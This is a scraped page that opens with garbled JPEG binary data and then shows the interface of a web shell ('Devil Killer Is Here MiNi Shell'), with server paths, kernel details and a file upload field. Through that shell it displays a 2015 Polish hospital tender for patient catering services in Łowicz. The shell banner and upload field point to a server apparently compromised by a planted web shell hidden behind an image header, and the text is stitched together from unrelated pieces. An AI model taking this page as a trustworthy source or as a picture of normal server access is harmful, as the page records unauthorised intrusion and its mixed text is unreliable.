JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150622/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150622/91143-N-2015.html

<p class="kh_header"><b>Łowicz: Świadczenie usług związanych z przygotowaniem całodziennych posiłków z uwzględnieniem zaleceń dietetycznych oraz ich dystrybucja na  poszczególne oddziały szpitalne.</b><br>
<b>Numer ogłoszenia: 91143 - 2015; data zamieszczenia: 22.06.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Opieki Zdrowotnej , ul. Ułańska 28, 99-400 Łowicz, woj. łódzkie, tel. 046 8375368 w. 250, faks 046 8375991.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zoz.pol.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług związanych z przygotowaniem całodziennych posiłków z uwzględnieniem zaleceń dietetycznych oraz ich dystrybucja na  poszczególne oddziały szpitalne..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia.
1. Przedmiotem zamówienia jest świadczenie usługi polegającej na:
1.1 kompleksowym przygotowywaniu posiłków z surowców Wykonawcy, 
1.2. dostarczanie posiłków wózkami Wykonawcy   do oddziałów  szpitalnych -  kuchenek oddziałowych,
1.3 odbiór odpadów pokonsumpcyjnych.
1.4 posiłki powinny  uwzględniać  zalecenia  dietetyczne, zgodnie z zaleceniami Instytutu Żywności i Żywienia dotyczącymi norm zapotrzebowania na energię i składniki odżywcze.
2.Posiłki dla pacjentów przebywających w oddziałach szpitalnych przygotowuje kuchnia główna w pomieszczeniach Zamawiającego . 
3.Posiłki dla ok. 45 pacjentów przebywających w Oddziale Fizjoterapii Rehabilitacji w Stanisławowie, odległego 24 km od głównej siedziby szpitala, powinny być dowożone z kuchni głównej, z zachowaniem przepisów sanitarnych.
4.Opis posiłków:
4.1   I śniadanie, 
4.2   II  Śniadanie (dla o/dziecięcego + dieta cukrzycowa),
4.3   Obiad,
4.4   Podwieczorek (dla o/ dziecięcego + dieta cukrzycowa),
4.5   Kolacja,
4.6  Dieta wysokobiałkowa o zmienionej konsystencji do żywienia przez zgłębnik lub przetokę przygotowywana w równych porcjach dla pacjenta, dostarczona do oddziału  w szczelnie zamykanych pojemnikach, wyporcjowana do jednorazowego podania. 
5.Gorące napoje do śniadania i kolacji w ilości niezbędnej do zaspokajania potrzeb pacjentów, niezależnie od napojów przewidzianych jadłospisem.
6.Posiłki do oddziałów szpitalnych w budynku głównym ZOZ Łowicz powinny być dostarczane w szczelnie zamykanych pojemnikach, zapewniających utrzymanie odpowiedniej temperatury posiłków.
7.Posiłki do OFiR w Stanisławowie powinny być dowożone samochodem, który został dopuszczony do przewozu żywności przez Państwowego Inspektora Sanitarnego  w termosach i innych szczelnie zamykanych pojemnikach.
8.Pojemniki i termosy muszą być zatwierdzone do użytkowania przez Państwowego Inspektora Sanitarnego.
9.Wykonawca zapewni odpowiednią jakość usługi oraz gwarantuje, że proces przygotowania i transportu dostarczanych posiłków będzie spełniać wszelkie wymagane normy sanitarne, określone w Ustawie z dnia 25 sierpnia 2006 r. o bezpieczeństwie  żywności i  żywienia (Dz. U. z 2010 r. Nr 136 poz. 914 j.t. ze zm.) w aktach wykonawczych wydanych na ich podstawie, a także z zasadami systemu HACCP. 
10.Wykonawca ponosi wyłączną odpowiedzialność za przestrzeganie Zasad Dobrej Praktyki Higienicznej (GHP), Dobrej Praktyki Produkcyjnej (GMP) i systemu Analizy Zagrożeń i Krytycznych Punktów Kontroli (HACCP).
11.Realizacja zamówienia odbywać się będzie w systemie ciągłym ( 7 dni w tygodniu).  W sytuacjach awaryjnych występujących u Wykonawcy mogących zakłócić dostawy posiłków, Wykonawca zobowiązany jest zapewnić we własnym zakresie ciągłość żywienia pacjentów.
12.Wykonawca zachowa obowiązujące normy sanitarno-epidemiologiczne oraz podda się nadzorowi epidemiologicznemu, audytom oraz badaniom mikrobiologicznym przeprowadzonym u Wykonawcy przez upoważnionego pracownika Zamawiającego.
13.Każdorazowo na żądanie Zamawiającego, Wykonawca winien okazać pracownicze książeczki zdrowia personelu oraz dokumentację z kontroli przeprowadzonych przez Państwowego Inspektora Sanitarnego. 
14.Wykonawca  w okresie 2 tygodni od podpisania umowy dołączy listę osób świadczących usługę do Działu Zamówień Publicznych ( do dokumentacji Umowy).
15.Pracownicy Wykonawcy w trakcie wykonywania usługi zobowiązani będą do:
- zachowania w ścisłej  tajemnicy danych osobowych i danych wrażliwych powziętych w związku z wykonywaniem usługi, których ujawnienie mogłoby spowodować szkodę Zamawiającego
- wypełnienia  oświadczenia stanowiącego załącznik nr 6 do SIWZ, a następnie oddania jednego egzemplarza  do pracownika Zamawiającego -  Administratora Bezpieczeństwa Informacji  w okresie do dwóch  tygodni od podpisania umowy.
- przy każdorazowej zmianie personelu Wykonawca zobowiązany będzie do uaktualniania listy pracowników i wypełnienia Załącznika nr 6.
16.Wykonawca przedstawi dokumentację potwierdzającą:
16.1 wprowadzenie i utrzymanie  systemu HACCP, zapewniającego  bezpieczeństwo żywności i żywienia oraz certyfikat ISO 22 000, 
16.2 decyzję właściwego terytorialnie Państwowego Inspektora Sanitarnego potwierdzającą, że oferent posiada środek transportu przeznaczony do przewozu posiłków, którym będzie realizowana usługa dostawy posiłków z miejsca wytwarzania do oddziału w Stanisławowie,
16.3 Oświadczenie, że Wykonawca przedstawi po podpisaniu umowy decyzję właściwego terytorialnie Państwowego Inspektora Sanitarnego dopuszczającą do realizacji usługi 
16.4 Oświadczenie, że Wykonawca po podpisaniu umowy przedstawi:  
-   decyzję/umowę/dokument na odbiór odpadów pokonsumpcyjnych,
- odpowiednie dokumenty należy dołączyć do składanej oferty.
17.W okresie do dwóch tygodni po  podpisaniu umowy  Wykonawca usługi przedstawi decyzję właściwego terytorialnie Państwowego Inspektora Sanitarnego dopuszczającą do świadczenia usług oraz umowę na  odbiór  odpadów pokonsumpcyjnych. Brak wymienionych dokumentów skutkuje zerwaniem umowy.
18.Wykonawca będzie zobowiązany do przedstawienia wykazu procedur / instrukcji wynikających z systemu HACCP na żądanie Zamawiającego. 
19.Zamawiający będzie żądał przedstawienia badań na czystość mikrobiologiczną powierzchni, sprzętu oraz rąk personelu Wykonawcy każdorazowo w przypadku zatruć, zakażeń pokarmowych.
Koszty tych badań pokrywa Wykonawca, który jest zobowiązany do dostarczania wyników Zamawiającemu.
20.Za uchybienia ujawnione w trakcie kontroli Państwowej Inspekcji Sanitarno - Epidemiologicznej wynikające z świadczonej przez Wykonawcę usługi odpowiada Wykonawca.
21.Wykonawca ponosić będzie odpowiedzialność prawną i materialną wobec organów kontroli ( PIS, PIP, BHP) w zakresie wykonywanej usługi.
22.Wykonawca jest zobowiązany do przedstawienia na żądanie Zamawiającego kserokopii protokołów pokontrolnych  (PIS, PIP) dotyczących realizacji przedmiotu zamówienia.
23.Wykonawca ponosi odpowiedzialność za wszystkie szkody spowodowane przez pracowników Wykonawcy powstałe w trakcie i zakresie realizacji umowy.

 Do obowiązków Wykonawcy  należało będzie:
1.Produkowanie  posiłków z pełnowartościowych produktów, z wyłączeniem produktów typu instant.
2.Przekazywanie Zamawiającemu trzy dni przed rozpoczęciem realizacji dwutygodniowego jadłospisu z podaniem gramatury, wartości kalorycznej, składu jakościowego posiłków.
3.Codzienne umieszczanie w widocznym miejscu w oddziale aktualnego na dany dzień jadłospisu, z którym mogą zapoznać się  pacjenci. Podpisany  przez osobę sporządzającą jadłospis powinien zawierać wagę pojedynczej porcji (ilość, objętość).
4.Urozmaicanie  posiłków przez dodatki w postaci surówek, warzyw, owoców sezonowych dostosowanych odpowiednio do diety.
5.Zatrudnienie dietetyka.
6.Przestrzeganie realizacji zaleceń Wojewódzkiej Stacji Sanitarno - Epidemiologicznej  oraz Instytutu Żywności i Żywienia w Warszawie w sprawie norm wyżywienia i żywienia, jakie obowiązują w zamkniętych zakładach żywienia zbiorowego oraz jakości zdrowotnej żywności zgodnie z obowiązującymi regulacjami prawnymi i zasadami systemu HACCP.
7.Zapewnienie najwyższego standardu bezpieczeństwa produkcji posiłków, w zgodzie z obowiązującymi obecnie przepisami sanitarnymi, a co za tym idzie - ich czystość mikrobiologiczną oraz fizykochemiczną.
8.Dostarczanie posiłków do Oddziału Fizjoterapii i Rehabilitacji w Stanisławowie zgodnie z obowiązującymi zasadami i przepisami.
9.Dostarczanie posiłków do kuchenek oddziałowych:
- wózkami do tego celu przeznaczonymi,
- pojemnikami  na posiłki szczelnie zamykanymi,
- przez osobę transportującą posiłki ubraną w czysty fartuch ochronny, czepek  zabezpieczający włosy.
10.Dostarczanie posiłku ciepłego w granicach 60-75°C -  kontrolowanie i dokumentowanie  temperatury  - dokumentacja dostępna do wglądu  w miejscu.
11.Zakup zastawy stołowej obiadowej + sztućce dla pacjentów (średnio 140 pacjentów dziennie), dzbanków do rozdawania napojów oraz ich bieżące uzupełnianie lub wymianę.
12.Wyposażenie kuchenek oddziałowych w kalibrowane nabierki, szczypce, łyżki perforowane, łyżki do serwowania, porcjonery do porcjowania posiłków (wg planowanych, typowych objętości - gramatury potraw).
13.Utrzymanie na własny koszt i we własnym zakresie stanu ilościowego naczyń i sztućców w kuchenkach oddziałowych  oraz zapewnienia pojemników zamykanych, służących do transportu odpadów pokonsumpcyjnych w ilości zgodnej z potrzebami. 
Utrzymanie ich w należytej czystości i stanie technicznym.
14. Utrzymywanie  w czystości i dobrym stanie technicznym wózków i pojemników używanych do przewozu posiłków.
15. Odbieranie od Zamawiającego po zakończeniu konsumpcji poszczególnych posiłków, odpadów pokonsumpcyjnych i zagospodarowanie ich we własnym zakresie.
16. Dostarczanie posiłków do Oddziału Anestezjologii i Intensywnej Terapii w jednorazowych naczyniach + sztućce, poza dietą wysokobiałkową dostarczaną w pojemnikach szczelnie zamykanych.
17. Odwożenie do kuchni głównej wózków do transportu posiłków, pojemników, resztek pokonsumpcyjnych i poddawanie ich procesowi dekontaminacji.
18.Odbieranie odpadów pokonsumpcyjnych zgodnie z zaleceniami Sanepidu - umowa u Wykonawcy
19.Pobieranie i przechowywanie próbek pokarmowych z każdej przyrządzonej na rzecz Zamawiającego potrawy zgodnie z Rozporządzeniem Ministra Zdrowia z dnia 17 kwietnia 2007 r.(Dz.U.2007 nr 80 poz 545).
20.Świadczenie usług, na wysokim poziomie:
a.posiłki będą o odpowiedniej gramaturze, zbilansowane pod względem:  wartości kalorycznej, odżywczej oraz grup produktów,
b.posiłki będą urozmaicone pod względem: barwy, smaku, doboru produktów,
c.posiłki będą spełniać wymagania diet obowiązujących w żywieniu szpitalnym,
d.posiłki będą uwzględniać potrawy o charakterze świątecznym i tradycyjnym na okoliczność świąt
21.Utrzymanie płynności wydawania posiłków.
22.Porcjowanie indywidualnie dla każdego pacjenta dodatków typu:  wędlina, sery, twarożek, masło itp..
23.Stosowanie  środków myjących, czyszczących  i dezynfekujących dopuszczonych do kontaktu z żywnością
24.Bieżącej naprawy sprzętu stanowiącego wyposażenie kuchni niezbędnego do sporządzania posiłków.
25.Przygotowywanie posiłków w pomieszczeniach  kuchennych,  które  powinny spełniać wymogi higieniczno - sanitarne konieczne do prowadzenia zbiorowego żywienia z uwzględnieniem bieżących zaleceń PIS i oraz prowadzenie bieżących remontów.
26.Zabezpieczenie w odzież ochronną, roboczą oraz środki ochrony indywidualnej pracowników realizujących produkcję, transport posiłków. 
27.Przestrzeganie przez pracowników  zasad higieny osobistej i estetycznego wyglądu.
28.Wyposażenie pracowników w identyfikatory imienne

IV. Zasady planowania żywienia i dystrybucja posiłków w oddziałach:

1.  Harmonogram wydawania posiłków:
I śniadanie 		 godz.    8.00
II Śniadanie		 godz.  10.00
Obiad			 godz.  12.30 - 13.00
Podwieczorek	             godz.   15.00
Kolacja	 	             godz.   17.00
Dieta wysokobiałkowa do żywienia przez zgłębnik lub przetokę  zgodnie z zapotrzebowaniem (wskazane jest podanie 6 posiłków co 3 godziny z przerwą nocną).
2.Dzienna ilość posiłków ustalana będzie codziennie na podstawie relewu ( codziennego zamówienia) wydawanego przez oddziały - dopuszcza się zgłoszenia telefoniczne.
3.Zgłaszanie do Wykonawcy zapotrzebowania ilościowego na poszczególne posiłki według harmonogramu: 
- Śniadanie	  do godziny   7.30
- Obiad     	  do godziny 10.30
- Kolacja    	  do godziny 13.30 
4.Na etapie realizacji umowy Zamawiający zastrzega sobie prawo do zmiany diet, jak również co do ilości posiłków w zależności od potrzeb i ilości leczonych pacjentów.
5.Zamawiający zastrzega sobie możliwość zwrotu żywności w przypadku stwierdzenia  nieprawidłowości jakościowych na podstawie pisemnej lub telefonicznej reklamacji.
W miejsce  zakwestionowanych posiłków muszą być dostarczone właściwe.
6. Wydawaniem śniadań ( I i II), obiadów, kolacji, podwieczorków - bezpośrednio do pacjenta zajmuje się personel Zamawiającego.
7. Naczynia stołowe od pacjentów myte/wyparzane/naświetlane w kuchenkach oddziałowych przez personel wyznaczony przez Zamawiającego.
Czynsz płatny będzie z góry do dnia 15 każdego miesiąca.
Po zakończeniu realizacji umowy pozostawienia poniesionych nakładów na pomieszczenia bez zapłaty ich równowartości.
Dane dotyczące personelu:
Wykonawca zobowiązuje się do przejęcia 6 pracowników, w trybie art. 231KP przy zapewnieniu wszelkich praw i uprawnień im przysługującym. Pracownicy zatrudnieni są w firmie, która obecnie świadczy usługi na rzecz ZOZ i przejęła pracowników w myśl art. 231KP. Miesięczne koszty osobowe przejmowanych pracowników wynoszą 14.351,00 zł (słownie: czternaście tysięcy trzysta pięćdziesiąt jeden złotych 00/100). 
Na wynagrodzenie brutto pracowników składa się tylko uposażenie zasadnicze bez dodatków i kształtuje się jak niżej.

Lp	Wymiar etatu	Czas trwania umowy o pracę	Stawka zaszeregowania (wynagrodzenie miesięczne brutto)	ZUS pracodawcy	Koszt wynagrodzenia	Liczba dni urlopu  na dzień  14.05.2015
1	1/1	czas nieokreślony	1750,00	307,95	2 057,65	21,75
2	1/1	czas nieokreślony              	3 150,00	553,77	3 703,77	28
3	1/1	czas określony
do  31.12.2015r	1 750,00	352,28	2 102,28	33,63
4	1/1	czas nieokreślony              	1750,00	352,28	2 102,28	17,88
5	1/1	czas nieokreślony 	1.900,00	382,47	2 282,47	17
6	1/1	czas nieokreślony 	1.750,00	352,28	2 102,28	24,25
			12.050,00		14 351,00	

Liczba osób przebywających na:
- urlopie macierzyńskim - 0 osób 
- urlopie wychowawczym - 0 osób
- urlopie bezpłatnym - 0 osób
Liczba osób nabywających uprawnienia do odprawy emerytalnej w okresie trwania umowy -1 osoba. Osoba umieszczona w tabeli w poz. 2 nabywa uprawnienia do odprawy emerytalnej dnia 08.02.2016r.

Ponadto Wykonawca zobowiązuje się dzierżawienia pomieszczeń Szpitala na prowadzenie powyższej usługi. Zamawiający oddaje w dzierżawę pomieszczenia, w tym: kuchnia centralna z magazynami oraz stołówką o łącznej powierzchni  235,91 m2 oraz pomieszczenia kuchni i stołówki w Oddziale Fizjoterapii i Rehabilitacji w Stanisławowie k/Bielaw o łącznej powierzchni 68,39 m2, wraz z urządzeniami stanowiącymi wyposażenie kuchni, na podstawie protokołu zdawczo - odbiorczego zawierającego specyfikację przekazanego sprzętu. Wykaz pomieszczeń i sprzętu stanowiących przedmiot dzierżawy i najmu zawiera załącznik nr 5 do niniejszej specyfikacji. 

Zamawiający ustala, iż kwota dzierżawy wynosi 1.685,96 zł netto miesięcznie + należny podatek VAT 23 % , co daje kwotę  2.073,73 zł brutto. 
Zamawiający dostarczy wykonawcy energię elektryczną, parę technologiczną, C.W. i C.O. 
Opłaty za powyższe będą naliczane wykonawcy wg szacunkowych kosztów Zamawiającego tj. :
-co,cw, para technologiczna-5.431,35 zł netto+23% podatek VAT= 6.680,56 zł brutto
-zw, ścieki, wywóz nieczystości - 554,86 zł netto + 8% podatek VAT = 599,25 zł brutto
- energia elektryczna - 1.760,64 zł netto + 23% podatek VAT = 2.165,59 zł brutt 
- opłata za telefon wg. faktycznego zużycia.

Informacja szczegółowa
 Ilość łóżek: 215  w tym:
Oddział Chorób Wewnętrznych	 	- 54 łóżka
Oddział Chirurgiczny 			- 40 łóżka
Oddział Położniczo- Ginekologiczny 		- 32 łóżka 
Oddział Pediatryczny 			- 21 łóżek
Oddział Fizjoterapii i Rehabilitacji		- 45 łóżek
Oddział Anestezjologii i Intensywnej Terapii       - 5 łóżek
Oddział Neonatologiczny			-18 łóżek 	

Dane za okres ostatnich 12 m-cy  /V.2014 - IV.2015r/.
Szacunkowa ilość posiłków do przygotowania i wydania w okresie 12 miesięcy: 
- śniadania 	 -  48 723 porcji
- obiady		-  47 502 porcji
- kolacje 		-  48 318 porcji 

Uśredniona ilość diet w ciągu jednego dnia wynosi  140,  w tym:
- dieta podstawowa	- 45 szt
- dieta łatwo strawna  	- 64 szt
- dieta cukrzycowa 	 -12 szt
- dieta wątrobowa   	 -  4 szt
- dieta wysokobiałkowa  	  - 2 szt
Diety o zmienionej konsystencji:
- dieta papkowata		-   5 szt
- dieta wysokobiałkowa do żywienia przez zgłębnik   -   8 szt.
Zamawiający zastrzega sobie możliwość zapotrzebowania diety innej  niż wyżej wymienione, indywidualnej na zlecenie lekarskie. 

Dnia 24.06.2015r. w godz. 9-11 Zamawiający udostępni Państwu pomieszczenia kuchni w celu przeprowadzenia wizji lokalnej..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6, 55.32.20.00-3, 55.52.12.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawcy na podstawie art. 45 ust. 1 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych zobowiązani są wnieść przed terminem składania ofert wadium. Zamawiający określa wadium w wysokości 15.000,00 zł
1. Wadium może być wnoszone w jednej lub kilku następujących formach:
1.1  pieniądzu   przelewem na konto Zamawiającego: Bank Pekao S.A II  o Łowicz  51124018191111000010887158.
Uwaga! Pieniądze muszą znajdować się na koncie Zamawiającego najpóźniej na moment otwarcia ofert z zaznaczeniem: wadium - przetarg nieograniczony na świadczenie usług związanych z przygotowaniem całodziennych posiłków z uwzględnieniem zaleceń dietetycznych oraz ich dystrybucja do  poszczególne oddziały szpitalne, kserokopia dokumentu musi być potwierdzona za zgodność z oryginałem i dołączona do oferty.
1.2 w poręczeniach bankowych 
1.3    gwarancjach bankowych 
1.4    gwarancjach ubezpieczeniowych 
1.5    poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust.5 pkt 2 ustawy z dnia 9.11.2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony w przypadku Wykonawców, którzy wykonali w okresie ostatnich trzech lat przed upływem terminu składania ofert,               a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 zamówienia odpowiadające swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia (tj. świadczenie usług żywienia pacjentów szpitalnych), wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączenia dowodów, czy zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony w przypadku Wykonawców, którzy posiadają samochód dopuszczony do przewozu żywności.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony w przypadku Wykonawców, którzy są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę nie niższą niż 500.000,00zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

